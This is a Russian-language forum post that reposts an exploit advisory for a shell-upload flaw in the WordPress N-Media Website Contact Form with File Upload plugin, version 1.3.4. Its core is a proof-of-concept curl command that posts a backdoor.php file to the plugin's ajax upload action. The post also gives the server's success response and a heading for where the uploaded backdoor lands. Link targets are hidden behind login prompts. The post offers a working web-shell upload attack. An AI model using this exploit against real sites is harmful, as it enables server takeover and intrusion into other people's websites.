1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Тема в разделе "Наши статьи", создана пользователем cristodulo, 13 апр 2015.

  1. TopicStarter Overlay
    cristodulo

    cristodulo

    Регистрация:
    19 мар 2015
    Сообщения:
    17
    Симпатии:
    14
    ######################

    # Exploit Title : WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

    # Exploit Author : Claudio Viviani


    # Software Link : Please login or register to view links

    # Date : 2015-04-1

    # Dork Google: Please login or register to view links
    Please login or register to view links

    # Tested on : Linux BackBox 4.0 / curl 7.35.0

    #####################

    # Info :

    The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.


    ######################

    # PoC:

    curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" Please login or register to view links


    Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}


    ######################

    # Backdoor Location:

    Please login or register to view links


    #####################

    Discovered By : Claudio Viviani
    Please login or register to view links
    Please login or register to view links (Free Fuzzy Hashes Database)

    info@homelab.it
    homelabit@protonmail.ch

    Please login or register to view links
    Please login or register to view links
    Please login or register to view links
    Please login or register to view links

    #####################
     
    • Like Like x 1
    Метки:

Поделиться этой страницей

Загрузка...